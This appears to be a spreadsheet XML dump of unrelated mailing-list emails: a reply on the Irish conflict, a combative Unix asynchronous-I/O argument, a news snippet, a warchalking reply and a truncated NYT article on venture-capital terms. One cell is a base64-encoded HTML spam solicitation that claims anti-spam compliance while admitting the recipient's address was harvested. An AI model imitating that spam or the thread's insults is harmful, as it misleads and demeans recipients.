 What about Tibetan Buddhism BTW?  They seem like an awfully nice bunch
 of chaps (and chapesses).
 &gt; When we launched the Native Net in 1989, one of the first things we
 &gt; noticed on networking aboriginal groups around the world is that the
 &gt; British Army, with the US Army as a proxy by extension, were the
 &gt; common thread.  Where neither was present (physically or through
 &gt; influence) there /tended/ to be less violence.
 &gt; 
 &gt; The issue in Ireland is complex, but rest assured that religious
 &gt; aspects are only a co-incidence of the invader/colonials being
 &gt; predominantly members of the Royal-headed Anglicans and the aboriginal
 &gt; population being predominantly members of the Pope-headed Catholics.
 &gt; The conflict itself has nothing to do with ideology or practice, since
 &gt; the Anglican Church is a near-identical clone of Catholicism.
 &gt; 
 &gt; (now I bet that's going to attract some healthy debate ;)
 Man, I'm not going *there* again ;)  I'll agree, though, that the ideology
 or practices of the religions have very little to do with the conflict.
 &gt; The same is true of street-gangs: When people are disenfranchised,
 &gt; it's easier to offer them the Triad as a new family.  You get
 &gt; cellphones, cars, a dry place to live.  Triad, biker gangs, mafia, the
 &gt; IRA, Al Queda ... we've been fighting the War on Terrorism for as long
 &gt; as there's been commerce, so you'd think we'd /realize/ that
 &gt; escalation of violence is not a solution.
 Well said!
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam Beberg writes:
 &gt; On Tue, 3 Sep 2002, Kragen Sitaker wrote:
 &gt; &gt; Unix acquired nonblocking I/O in the form of select() about 23 years
 &gt; &gt; ago, and Solaris has had the particular aio_* calls we are discussing
 &gt; &gt; for many years.
 &gt; 
 &gt; select() "scaling" is a joke at best, and I know you know that. poll() is
 &gt; only a bit better.
 Not only do I know that, the post to which you were responding
 explained that, with somewhat more detail than "a joke".  As you
 should know, but evidently don't, poll() isn't even "a bit better" ---
 in fact, it's about an order of magnitude worse --- for dense file
 descriptor sets, which is the normal case.  (Except on operating
 systems where select() isn't a system call but a library routine that
 calls poll().)
 &gt; &gt; Very few applications need the aio_* calls --- essentially only
 &gt; &gt; high-performance RDBMS servers even benefit from them at all, and
 &gt; &gt; most of those have been faking it fine for a while with multiple
 &gt; &gt; threads or processes.  This just provides a modicum of extra
 &gt; &gt; performance.
 &gt; 
 &gt; Wrong, it makes a huge difference in even what I consider small programs.
 Why don't you explain this in more detail?
 &gt; &gt; Although I don't have a copy of the spec handy, I think the aio_* APIs
 &gt; &gt; come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is
 &gt; &gt; 13 years old, and which I think documented then-current practice.
 &gt; &gt; They might be even older than that.
 &gt; 
 &gt; Yes, SGI has a patch to the linux kernel to implement the aio_ interfaces,
 &gt; but it's still not built in, who knows when it will be. The point is it's
 &gt; not portable in either case.
 You originally said:
   Could it be? After 20 years without this feature UNIX finally
   catches up to Windows and has I/O that doesnt [sic] totally suck for
   nontrivial apps? No way!
 The point --- my point, the point I was discussing; please don't try
 to tell me you were trying to make a different point, because I don't
 care --- is that you had no clue what you were talking about; Unix
 hasn't been without this feature, and in fact has had it since you
 were in elementary school, and operating systems without it don't
 "totally suck for nontrivial apps".
 For what it's worth, glibc has actually implemented the aio_* calls
 for a while, just in a way that doesn't scale to large numbers of
 concurrent I/O requests.  I find references to the glibc
 implementation as far back as 1999 and glibc 2.1.1, and I could
 probably find much earlier references if I had time:
 http://sources.redhat.com/ml/libc-hacker/1999-12/msg00070.html
 (more details at
 http://www.atnf.csiro.au/people/rgooch/linux/docs/io-events.html;
 details on the SGI patch are at
 http://oss.sgi.com/projects/kaio/faq.html)
 &gt; &gt; Unix has been multiprocess since 1969, and most Unix implementations
 &gt; &gt; have supported multithreading for a decade or more.
 &gt; 
 &gt; And most UNIX is still kinda-sorta supporting the pthreads (POSIX)
 &gt; interface, each in their own 7/8 implementation. You're safe if you
 &gt; stick to the basics.
 Your original complaint was that Unix didn't do multithreading or
 multiprogramming well.  Now that I've pointed out how obviously
 idiotic that claim is, you've amended your complaint: now, although
 individual Unixes do these things well, you complain that their
 implementations are not entirely conformant with the POSIX threads
 specification.  Well, that's probably true, but I haven't written
 pthreads programs in C much myself, so I can't confirm it from my own
 experience.  But, even if it's true, it's not a very good reason to
 prefer Windows.
 I'm sure you can provide examples of bugs in particular threading
 implementations.  Spare us.  Just shut up.
 -- 
 &lt;kragen@pobox.com&gt;       Kragen Sitaker     &lt;http://www.pobox.com/~kragen/&gt;
 Edsger Wybe Dijkstra died in August of 2002.  The world has lost a great
 man.  See http://advogato.org/person/raph/diary.html?start=252 and
 http://www.kode-fu.com/geek/2002_08_04_archive.shtml for details.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Question From Patrick In Ireland
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_0066_62CFF34B.9C652FBA
 Content-Type: text/html
 Content-Transfer-Encoding: base64
 PEhUTUw+DQoNCjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250
 ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUyIj4NCjxNRVRBIG5hbWU9IkdF
 TkVSQVRPUiIgY29udGVudD0iTWljcm9zb2Z0IEZyb250UGFnZSA0LjAiPg0KPE1FVEEgbmFt
 ZT0iUHJvZ0lkIiBjb250ZW50PSJGcm9udFBhZ2UuRWRpdG9yLkRvY3VtZW50Ij4NCjxUSVRM
 RT5UaGFua3M8L1RJVExFPg0KPC9IRUFEPg0KDQo8Qk9EWT4NCg0KPFRBQkxFIGNlbGxTcGFj
 aW5nPSIwIiBjZWxsUGFkZGluZz0iMCIgYm9yZGVyPSIwIj4NCjxUQk9EWT4NCjxUUj4NCjxU
 RCB2QWxpZ249InRvcCIgd2lkdGg9IjQ0IiBoZWlnaHQ9IjIzIj48L1REPg0KPFREIHZBbGln
 bj0idG9wIiB3aWR0aD0iNTkwIiBoZWlnaHQ9IjEwNSIgcm93U3Bhbj0iMiI+DQo8RElWIHN0
 eWxlPSJMRUZUOiA4N3B4OyBXSURUSDogNTkwcHg7IFBPU0lUSU9OOiBhYnNvbHV0ZTsgVE9Q
 OiAxN3B4OyBIRUlHSFQ6IDEwMnB4Ij4NCjxUQUJMRSBib3JkZXJDb2xvckRhcms9IiMwMDAw
 MDAiIHdpZHRoPSIxMDAlIiBib3JkZXJDb2xvckxpZ2h0PSIjMzMzMzk5IiBib3JkZXI9IjIi
 IG1tX25vY29udmVydD0iVFJVRSI+DQo8VEJPRFk+DQo8VFIgYmdDb2xvcj0iI2UzZTNlMyI+
 DQo8VEQ+DQo8RElWIGFsaWduPSJjZW50ZXIiPg0KPE9CSkVDVCBjb2RlQmFzZT0iaHR0cDov
 L2Rvd25sb2FkLm1hY3JvbWVkaWEuY29tL3B1Yi9zaG9ja3dhdmUvY2Ficy9mbGFzaC9zd2Zs
 YXNoLmNhYiMzLDAsMCwwIiBjbGFzc2lkPSJjbHNpZDpEMjdDREI2RS1BRTZELTExY2YtOTZC
 OC00NDQ1NTM1NDAwMDAiIHdpZHRoPSI0MDAiDQpoZWlnaHQ9IjgwIj4NCjxQQVJBTSBOQU1F
 PSJfY3giIFZBTFVFPSIxMDU4NCI+DQo8UEFSQU0gTkFNRT0iX2N5IiBWQUxVRT0iMjExNyI+
 DQo8UEFSQU0gTkFNRT0iTW92aWUiIFZBTFVFPSJodHRwOi8vd3d3Lm1sbXJlcG9ydGVyLmNv
 bS9pbWFnZXMvbWxtaW50cm9ncmV5LnN3ZiI+DQo8UEFSQU0gTkFNRT0iU3JjIiBWQUxVRT0i
 aHR0cDovL3d3dy5tbG1yZXBvcnRlci5jb20vaW1hZ2VzL21sbWludHJvZ3JleS5zd2YiPg0K
 PFBBUkFNIE5BTUU9IldNb2RlIiBWQUxVRT0iV2luZG93Ij4NCjxQQVJBTSBOQU1FPSJQbGF5
 IiBWQUxVRT0iLTEiPg0KPFBBUkFNIE5BTUU9Ikxvb3AiIFZBTFVFPSItMSI+DQo8UEFSQU0g
 TkFNRT0iUXVhbGl0eSIgVkFMVUU9IkhpZ2giPg0KPFBBUkFNIE5BTUU9IlNBbGlnbiIgVkFM
 VUU+DQo8UEFSQU0gTkFNRT0iTWVudSIgVkFMVUU9Ii0xIj4NCjxQQVJBTSBOQU1FPSJCYXNl
 IiBWQUxVRT4NCjxQQVJBTSBOQU1FPSJTY2FsZSIgVkFMVUU9IlNob3dBbGwiPg0KPFBBUkFN
 IE5BTUU9IkRldmljZUZvbnQiIFZBTFVFPSIwIj4NCjxQQVJBTSBOQU1FPSJFbWJlZE1vdmll
 IiBWQUxVRT0iMCI+DQo8UEFSQU0gTkFNRT0iQkdDb2xvciIgVkFMVUU+DQo8UEFSQU0gTkFN
 RT0iU1dSZW1vdGUiIFZBTFVFPjxFTUJFRCBzcmM9Imh0dHA6Ly93d3cubWxtcmVwb3J0ZXIu
 Y29tL2ltYWdlcy9tbG1pbnRyb2dyZXkuc3dmIiBwbHVnaW5zcGFnZT0iaHR0cDovL3d3dy5t
 YWNyb21lZGlhLmNvbS9zaG9ja3dhdmUvZG93bmxvYWQvIiB0eXBlPSJhcHBsaWNhdGlvbi94
 LXNob2Nrd2F2ZS1mbGFzaCINCndpZHRoPSI0MDAiIGhlaWdodD0iODAiPg0KPC9PQkpFQ1Q+
 DQo8L0RJVj48L1REPjwvVFI+DQo8L1RCT0RZPjwvVEFCTEU+DQo8L0RJVj48L1REPjwvVFI+
 DQo8VFI+DQo8VEQgdkFsaWduPSJ0b3AiIHdpZHRoPSI0NCIgaGVpZ2h0PSI4MiI+PC9URD48
 L1RSPg0KPC9UQk9EWT48L1RBQkxFPg0KPFAgY2xhc3M9Ik1zb05vcm1hbCIgc3R5bGU9Im1z
 by1sYXlvdXQtZ3JpZC1hbGlnbjogbm9uZSIgYWxpZ249ImNlbnRlciI+PEI+PFNQQU4gbGFu
 Zz0iRU4tSUUiDQpzdHlsZT0iRk9OVC1TSVpFOiAyMHB0OyBDT0xPUjogYmxhY2s7IEZPTlQt
 RkFNSUxZOiAnQ29wcGVycGxhdGUgR290aGljIExpZ2h0JzsgbXNvLWJpZGktZm9udC1mYW1p
 bHk6ICdDb3VyaWVyIE5ldyc7IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1JRTsgbXNvLWJpZGkt
 Zm9udC1zaXplOiAxMi4wcHQiPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOw0KPC9T
 UEFOPjxGT05UIGZhY2U9IkJvb2ttYW4gT2xkIFN0eWxlIj48U1BBTg0Kc3R5bGU9ImZvbnQt
 ZmFtaWx5OiBDb3BwZXJwbGF0ZSBHb3RoaWMgTGlnaHQ7IG1zby1iaWRpLWZvbnQtZmFtaWx5
 OiBDb3VyaWVyIE5ldzsgbXNvLWFuc2ktbGFuZ3VhZ2U6IEVOLUlFOyBtc28tYmlkaS1mb250
 LXNpemU6IDEyLjBwdCIgbGFuZz0iRU4tSUUiPiZuYnNwO1RoYW5rIHlvdSBmb3INCnRha2lu
 ZyB0aGUgdGltZSB0byB2aWV3IG15IGUtbWFpbDwvU1BBTj48L0ZPTlQ+PC9CPjwvUD4NCjxQ
 IGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJtc28tbGF5b3V0LWdyaWQtYWxpZ246IG5vbmUi
 IGFsaWduPSJjZW50ZXIiPjxCPjxGT05UIGZhY2U9IkJvb2ttYW4gT2xkIFN0eWxlIiBzaXpl
 PSI2IiBjb2xvcj0iIzAwMDA4MCI+PFNQQU4NCnN0eWxlPSJmb250LWZhbWlseTogQ29wcGVy
 cGxhdGUgR290aGljIExpZ2h0OyBtc28tYmlkaS1mb250LWZhbWlseTogQ291cmllciBOZXc7
 IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1JRTsgbXNvLWJpZGktZm9udC1zaXplOiAxMi4wcHQi
 IGxhbmc9IkVOLUlFIj5JUkVMQU5EPC9TUEFOPjwvRk9OVD48L0I+PC9QPg0KPFAgY2xhc3M9
 Ik1zb05vcm1hbCIgc3R5bGU9Im1zby1sYXlvdXQtZ3JpZC1hbGlnbjogbm9uZSIgYWxpZ249
 ImNlbnRlciI+PEI+PEZPTlQgZmFjZT0iQm9va21hbiBPbGQgU3R5bGUiIHNpemU9IjQiPjxT
 UEFOIHN0eWxlPSJmb250LWZhbWlseTogQ29wcGVycGxhdGUgR290aGljIExpZ2h0OyBtc28t
 YmlkaS1mb250LWZhbWlseTogQ291cmllciBOZXc7IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1J
 RTsgbXNvLWJpZGktZm9udC1zaXplOiAxMi4wcHQiDQpsYW5nPSJFTi1JRSI+Jm5ic3A7PC9T
 UEFOPjwvRk9OVD48Rk9OVCBmYWNlPSJCb29rbWFuIE9sZCBTdHlsZSIgc2l6ZT0iNyI+PFNQ
 QU4gc3R5bGU9ImZvbnQtc2l6ZTogMjBwdDsgZm9udC1mYW1pbHk6IENvcHBlcnBsYXRlIEdv
 dGhpYyBMaWdodDsgbXNvLWJpZGktZm9udC1mYW1pbHk6IENvdXJpZXIgTmV3OyBtc28tYW5z
 aS1sYW5ndWFnZTogRU4tSUU7IG1zby1iaWRpLWZvbnQtc2l6ZTogMTIuMHB0Ig0KbGFuZz0i
 RU4tSUUiPiZuYnNwOyZuYnNwOyZuYnNwOzwvU1BBTj48L0ZPTlQ+PC9CPjxpbWcgc3JjPSJo
 dHRwOi8vd3d3LndlYmRldmVsb3Blci5jb20vYW5pbWF0aW9ucy9ibmlmaWxlcy9ibHVsdGJh
 ci5naWYiIHdpZHRoPSI1NzUiIGhlaWdodD0iMTAiPjwvUD4NCjxQIGNsYXNzPSJNc29Ob3Jt
 YWwiIHN0eWxlPSJtc28tbGF5b3V0LWdyaWQtYWxpZ246IG5vbmUiIGFsaWduPSJjZW50ZXIi
 PjxTUEFOIGxhbmc9IkVOLUlFIg0Kc3R5bGU9IkNPTE9SOiBuYXZ5OyBGT05ULUZBTUlMWTog
 J0NhbGlmb3JuaWFuIEZCJzsgbXNvLWJpZGktZm9udC1mYW1pbHk6ICdDb3VyaWVyIE5ldyc7
 IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1JRSI+Jm5ic3A7SSB3b3VsZCBsaWtlIHdpdGggeW91
 ciBwZXJtaXNzaW9uIHRvIHNoYXJlIHdpdGgNCnlvdSwgc29tZXRoaW5nIHRoYXQganVzdCBt
 aWdodCBiZSBvZiBNYWpvciBJbnRlcmVzdCB0byB5b3UuJm5ic3A7PC9TUEFOPjwvUD4NCjxQ
 IGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJtc28tbGF5b3V0LWdyaWQtYWxpZ246IG5vbmUi
 IGFsaWduPSJjZW50ZXIiPjxTUEFODQpzdHlsZT0iY29sb3I6IG5hdnk7IGZvbnQtZmFtaWx5
 OiBDYWxpZm9ybmlhbiBGQjsgbXNvLWJpZGktZm9udC1mYW1pbHk6IENvdXJpZXIgTmV3OyBt
 c28tYW5zaS1sYW5ndWFnZTogRU4tSUUiIGxhbmc9IkVOLUlFIj5UbyByZXBseSBwbGVhc2Ug
 dXNlIHRoaXMgZS1tYWlsIGxpbmsgYmVsb3c8L1NQQU4+PC9QPg0KPFAgY2xhc3M9Ik1zb05v
 cm1hbCIgc3R5bGU9Im1zby1sYXlvdXQtZ3JpZC1hbGlnbjogbm9uZSIgYWxpZ249ImNlbnRl
 ciI+PFNQQU4NCnN0eWxlPSJjb2xvcjogbmF2eTsgZm9udC1mYW1pbHk6IENhbGlmb3JuaWFu
 IEZCOyBtc28tYmlkaS1mb250LWZhbWlseTogQ291cmllciBOZXc7IG1zby1hbnNpLWxhbmd1
 YWdlOiBFTi1JRSIgbGFuZz0iRU4tSUUiPjxBDQpocmVmPSJtYWlsdG86c3lzdGVteGJpejIw
 MDJAZWlyY29tLm5ldD9zdWJqZWN0PWdyb3VwLWluZm8iPnN5c3RlbXhiaXoyMDAyQGVpcmNv
 bS5uZXQ/c3ViamVjdD1ncm91cC1pbmZvJm5ic3A7PC9BPiA8L1NQQU4+PC9QPg0KPFAgY2xh
 c3M9Ik1zb05vcm1hbCIgc3R5bGU9Im1zby1sYXlvdXQtZ3JpZC1hbGlnbjogbm9uZSIgYWxp
 Z249ImNlbnRlciI+PFNQQU4gc3R5bGU9InBvc2l0aW9uOiBhYnNvbHV0ZTsgbGVmdDogMTIz
 OyB0b3A6IDM4OCI+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViZGV2ZWxvcGVyLmNvbS9hbmlt
 YXRpb25zL2JuaWZpbGVzL2JsdWx0YmFyLmdpZiIgd2lkdGg9IjU3NSIgaGVpZ2h0PSIxMCI+
 PC9TUEFOPjwvUD4NCjxQIGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxlPSJtc28tbGF5b3V0LWdy
 aWQtYWxpZ246IG5vbmUiPiZuYnNwOzwvUD4NCjxQIGNsYXNzPSJNc29Ob3JtYWwiIHN0eWxl
 PSJtc28tbGF5b3V0LWdyaWQtYWxpZ246IG5vbmUiPjxTUEFOIGxhbmc9IkVOLUlFIg0Kc3R5
 bGU9IkNPTE9SOiBuYXZ5OyBGT05ULUZBTUlMWTogJ0NhbGlmb3JuaWFuIEZCJzsgbXNvLWJp
 ZGktZm9udC1mYW1pbHk6ICdDb3VyaWVyIE5ldyc7IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1J
 RSI+PEI+QmVzdCBXaXNoZXM8bzpwPg0KPC9vOnA+DQombmJzcDsNCjwvQj4NCjwvU1BBTj48
 L1A+DQo8UCBjbGFzcz0iTXNvTm9ybWFsIiBzdHlsZT0ibXNvLWxheW91dC1ncmlkLWFsaWdu
 OiBub25lIj48U1BBTiBsYW5nPSJFTi1JRSINCnN0eWxlPSJDT0xPUjogbmF2eTsgRk9OVC1G
 QU1JTFk6ICdDYWxpZm9ybmlhbiBGQic7IG1zby1iaWRpLWZvbnQtZmFtaWx5OiAnQ291cmll
 ciBOZXcnOyBtc28tYW5zaS1sYW5ndWFnZTogRU4tSUUiPjxCPk1jIENhbm4gR3JvdXAgSW5j
 LiZuYnNwOyA8L286cD4NCjwvQj4NCjwvU1BBTj48L1A+DQo8UCBjbGFzcz0iTXNvTm9ybWFs
 IiBzdHlsZT0ibXNvLWxheW91dC1ncmlkLWFsaWduOiBub25lIj48U1BBTiBsYW5nPSJFTi1J
 RSINCnN0eWxlPSJDT0xPUjogbmF2eTsgRk9OVC1GQU1JTFk6ICdDYWxpZm9ybmlhbiBGQic7
 IG1zby1iaWRpLWZvbnQtZmFtaWx5OiAnQ291cmllciBOZXcnOyBtc28tYW5zaS1sYW5ndWFn
 ZTogRU4tSUUiPjxCPklyZWxhbmQuIDxvOnA+DQogPC9CPg0KPC9vOnA+DQo8L1NQQU4+PC9Q
 Pg0KPFAgY2xhc3M9Ik1zb05vcm1hbCIgc3R5bGU9Im1zby1sYXlvdXQtZ3JpZC1hbGlnbjog
 bm9uZSIgYWxpZ249ImNlbnRlciI+PFNQQU4gbGFuZz0iRU4tSUUiDQpzdHlsZT0iQ09MT1I6
 IG5hdnk7IEZPTlQtRkFNSUxZOiAnQ2FsaWZvcm5pYW4gRkInOyBtc28tYmlkaS1mb250LWZh
 bWlseTogJ0NvdXJpZXIgTmV3JzsgbXNvLWFuc2ktbGFuZ3VhZ2U6IEVOLUlFIj4mbmJzcDs8
 bzpwPjwvU1BBTj4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
 KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio8QlI+
 PEI+PFNQQU4NCnN0eWxlPSJGT05ULVNJWkU6IDhwdDsgbXNvLWJpZGktZm9udC1zaXplOiAx
 Mi4wcHQiPlRoaXMgZW1haWwgaXMgc2VudCBpbiBjb21wbGlhbmNlIHdpdGggc3RyaWN0IGFu
 dGktYWJ1c2UgYW5kIE5PIFNQQU0gcmVndWxhdGlvbnMuPEJSPllvdXIgYWRkcmVzcyB3YXMg
 Y29sbGVjdGVkIGFzIGENCnJlc3VsdCBvZiBwb3N0aW5nIHRvIGEgbGluaywgYSBjbGFzc2lm
 aWVkIGFkIG9yPEJSPnlvdSBoYXZlIG1haWxlZCBtZSByZWNlbnRseSwgb3IgeW91IGFyZSBv
 biBhIGxpc3QgdGhhdCBJIGhhdmU8QlI+cHVyY2hhc2VkLiBUbyByZW1vdmUgeW91ciBFLW1h
 aWwgYWRkcmVzczxTUEFODQpzdHlsZT0ibXNvLXNwYWNlcnVuOiB5ZXMiPiZuYnNwOyZuYnNw
 OyA8L1NQQU4+c2ltcGx5IGNsaWNrIG9uIHRoZTxCUj5SZXBseSBidXR0b24gd2l0aCAmcXVv
 dDs8QSBocmVmPSJtYWlsdG86c3lzdGVteGJpekBlaXJjb20ubmV0P3N1YmplY3Q9UmVtb3Zl
 Ij5SZW1vdmU8L0E+JnF1b3Q7IGluIHRoZQ0Kc3ViamVjdCBsaW5lLjwvU1BBTj48L0I+PFNQ
 QU4gc3R5bGU9IkZPTlQtU0laRTogMTBwdDsgQ09MT1I6IHdoaXRlOyBGT05ULUZBTUlMWTog
 QXJpYWw7IExFVFRFUi1TUEFDSU5HOiAtMC4yNXB0OyBtc28tYmlkaS1mb250LWZhbWlseTog
 J1RpbWVzIE5ldyBSb21hbiciPjxvOnA+DQo8L286cD4NCjwvU1BBTj48L1A+DQo8UCBjbGFz
 cz0iTXNvTm9ybWFsIj4mbmJzcDs8bzpwPg0KPC9vOnA+DQo8L1A+DQo8UCBjbGFzcz0iTXNv
 Tm9ybWFsIiBzdHlsZT0ibXNvLWxheW91dC1ncmlkLWFsaWduOiBub25lIj48U1BBTiBsYW5n
 PSJFTi1JRSINCnN0eWxlPSJDT0xPUjogbmF2eTsgRk9OVC1GQU1JTFk6ICdDYWxpZm9ybmlh
 biBGQic7IG1zby1iaWRpLWZvbnQtZmFtaWx5OiAnQ291cmllciBOZXcnOyBtc28tYW5zaS1s
 YW5ndWFnZTogRU4tSUUiPiZuYnNwOzxvOnA+DQo8L286cD4NCjwvU1BBTj48L1A+DQo8UCBj
 bGFzcz0iTXNvTm9ybWFsIj48U1BBTiBzdHlsZT0iQ09MT1I6IG5hdnk7IEZPTlQtRkFNSUxZ
 OiAnQ2FsaWZvcm5pYW4gRkInIj4mbmJzcDs8bzpwPg0KPC9vOnA+DQo8L1NQQU4+PC9QPg0K
 PFAgY2xhc3M9Ik1zb05vcm1hbCI+Jm5ic3A7PC9QPg0KPFAgY2xhc3M9InJlZmVyZW5jZWlu
 aXRpYWxzIiBzdHlsZT0iVEVYVC1BTElHTjogY2VudGVyIiBhbGlnbj0iY2VudGVyIj48U1BB
 Tg0Kc3R5bGU9IkZPTlQtU0laRTogOHB0OyBGT05ULUZBTUlMWTogQXJpYWw7IG1zby1iaWRp
 LWZvbnQtZmFtaWx5OiAnQXJpYWwgVW5pY29kZSBNUyc7IG1zby1iaWRpLWZvbnQtc2l6ZTog
 MTAuMHB0Ij4gPEI+DQo8L086UD4NCjwvQj48L1NQQU4+PC9QPg0KPFAgY2xhc3M9Ik1zb05v
 cm1hbCI+PEI+PFNQQU4gc3R5bGU9IkZPTlQtU0laRTogOHB0OyBDT0xPUjogcmVkOyBGT05U
 LUZBTUlMWTogJ0FyaWFsIE5hcnJvdyc7IG1zby1iaWRpLWZvbnQtc2l6ZTogMTIuMHB0Ij4m
 bmJzcDs8TzpQPg0KIDwvTzpQPg0KPC9TUEFOPjwvQj48L1A+DQo8UCBjbGFzcz0iTXNvTm9y
 bWFsIj48Qj48U1BBTiBzdHlsZT0iQ09MT1I6IGJsYWNrIj4mbmJzcDs8TzpQPg0KIDwvTzpQ
 Pg0KPC9TUEFOPjwvQj48L1A+DQo8UCBjbGFzcz0iTXNvTm9ybWFsIj4mbmJzcDs8TzpQPg0K
 IDwvTzpQPg0KPC9QPg0KPFAgYWxpZ249ImxlZnQiPiZuYnNwOzwvUD4NCjxQIGFsaWduPSJs
 ZWZ0Ij4mbmJzcDs8L1A+DQoNCjwvQk9EWT4NCg0KPC9IVE1MPg0KDQoNCg0KICAgIA==
 ------=_NextPart_000_0066_62CFF34B.9C652FBA--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fatal seal epidemic burns out
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8473772,1440/
 Date: Not supplied
 And so many North Sea harbour seals have been killed that a repeat outbreak in 
 the 2003 breeding season is highly unlikely
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: warchalking
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt; writes:
     G&gt; ... Can you imagine threatening someone to get your wireless?
 Well ... considering they happily cashed my $2000 cheque almost a
 month ago and I'm /still/ using crippled auracom dialup, yes, I can
 imagine this, quite vividly; I will be beta-testing it sometime early
 next week if dsisp.net don't get my antenna rigged and guy-wired pdq.
 I'm paying /interest/ on that $2k!
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYT: Venture Capitalists Are Taking the Gloves Off
</t>
  </si>
  <si>
    <t xml:space="preserve">The trend isn't news, but some of the details of the ugliness are 
 interesting.   Worth FoRKing for the archives, too.
 http://www.nytimes.com/2002/07/28/business/yourmoney/28VENT.html?todaysheadlines=&amp;pagewanted=print&amp;position=top
 July 28, 2002
 Venture Capitalists Are Taking the Gloves Off
 By LYNNLEY BROWNING
 The venture capital world is looking less like a genteel club and more like
 a brawling barroom.
 Venture capitalists are offering the companies they bankroll increasingly
 hard-knuckled deals that leave little wealth for a start-up's managers or
 original backers. The moves are leading some entrepreneurs, desperate for
 money, to decry today's investors as bullies. Some venture capitalists are
 even suing rival venture firms, asserting that the tough new terms are
 wiping out the value of their previous investments.
 "People are playing hardball," said Ted Dintersmith, a general partner at
 Charles River Ventures, based in Waltham, Mass.
 The bursting of the Internet stock bubble more than two years ago wiped out
 many venture investments in dot-coms. Now, amid the bear market in stocks
 and limited prospects for investors or young companies to make money soon,
 venture capitalists are looking for novel ways to make money. As a result,
 "private companies are facing the most onerous terms from venture
 capitalists that we have seen in 20 years," said Steven E. Bochner, a
 securities lawyer at Wilson Sonsini Goodrich &amp; Rosati in Palo Alto, Calif.,
 who represents venture firms.
 In the boom of the late 1990's, venture capitalists chose one of two
 options. They could be paid back their invested capital, share in profits
 and receive dividends. Or they could convert their preferred shares into
 common stock when the private company held an initial public offering or
 was sold. During that time of huge payouts for newly public and acquired
 companies, they usually chose No. 2.
 But with markets now all but dead for initial public offerings and mergers
 and acquisitions, venture capitalists from Silicon Valley to the East Coast
 are increasingly demanding - and getting - both options. This "double dip,"
 known as "participating preferred," leaves far less potential wealth for a
 company's founders and previous investors. Venture capitalists are also
 negotiating more deals with heightened "liquidation preferences," in which
 start-ups agree to pay back the initial investment at least two or three
 times over.
 Previously, venture capitalists handed over money to a start-up in a lump
 sum. But more are now parceling out funds in tranches, and then only when
 the new companies reach certain milestones - a sales target, for example,
 or the hiring of a particular chief executive.
 They are even trying to protect their investments through veto rights that
 permit them to block future investments from other venture capitalists who
 might dilute their stakes, said Mark G. Borden, chairman of the corporate
 department at Hale &amp; Dorr, a law firm based in Boston. As a result, Mr.
 Borden said, a start-up company that casts its lot with a particular
 venture capitalist or group of investors may find itself tethered to those
 backers and unable to raise new money elsewhere.
 ENTREPRENEURS particularly dislike one recent trend: venture capitalists
 have been pushing young companies to agree, retroactively, to lower the
 prices that investors now pay for shares should the start-up be worth less
 when it tries to raise more money later. Such a move, known as a "full
 ratchet," is intended to prevent an investor's stake from being diluted.
 But it can significantly reduce or even wipe out the stakes of a company's
 original investors and managers, giving the new investors most of the
 company for a song.
 "If you were in the first round of investors, you generally now get
 crushed" when a start-up raises more money later, said J. Edmund Colloton,
 general partner and chief operating officer of Bessemer Venture Partners,
 based in Wellesley Hills, Mass.
 Consider Mahi Networks, a private optical networking start-up. In three
 rounds of financing, from September 1999 to November 2001, Mahi raised $110
 million from blue-chip venture firms like Benchmark Capital, Sequoia
 Capital, the GE Capital unit of General Electric and the venture arm of
 Goldman Sachs. At one point during the Internet boom, Mahi was valued at
 more than $180 million.
 Last month, though, a new group of smaller-name investors, led by St. Paul
 Venture Capital of Minneapolis, acquired about three-quarters of the
 company for $75 million in financing. Before that, Mahi was valued at only
 $25 million, said Chris Rust, Mahi's president and chief executive. But
 most of that was tied up in employee incentives, including stock options,
 leaving almost no value for existing investors.
 Despite having nurtured Mahi with money and advice, the early investors
 chose not to back the company further. With the new, lower valuation,
 "there was effectively no value attributed to all of our previous
 investments," said one venture capitalist whose firm was an early backer.
 "We were all completely washed out" in the last round, said the investor,
 who spoke on condition of anonymity.
 There is no hard data on the prevalence of the newer, tougher terms.
 Venture capitalists are famously secretive about their deals, which are
 private and largely unregulated. But ask venture capitalists or securities
 lawyers who work with start-ups, and tales of onerous terms will abound.
 "At the end of the day, the money is coming with strings attached," said
 Mark G. Heesen, president of the National Venture Capital Association, a
 trade group based in Arlington, Va.
 The shift has turned the conventional wisdom on its head. Venture
 capitalists once loved risk, but no more. The Internet bust and Wall
 Street's slump have left them scrambling to make money to repay their own
 investors and to justify their management fees.
 Venture capitalists once clamored to be first in the door of a hot new
 company. Now they can usually make money only by being the most recent
 investor. "We're certainly looking for later-stage deals, where you get the
 benefit of the previous investors having taken the risk," said Todd Dagres,
 a general partner at Battery Ventures in Wellesley, Mass.
 Some entrepreneurs agree to the harsh new terms simply because they have no
 other way to raise cash to survive. But other managers now shun the
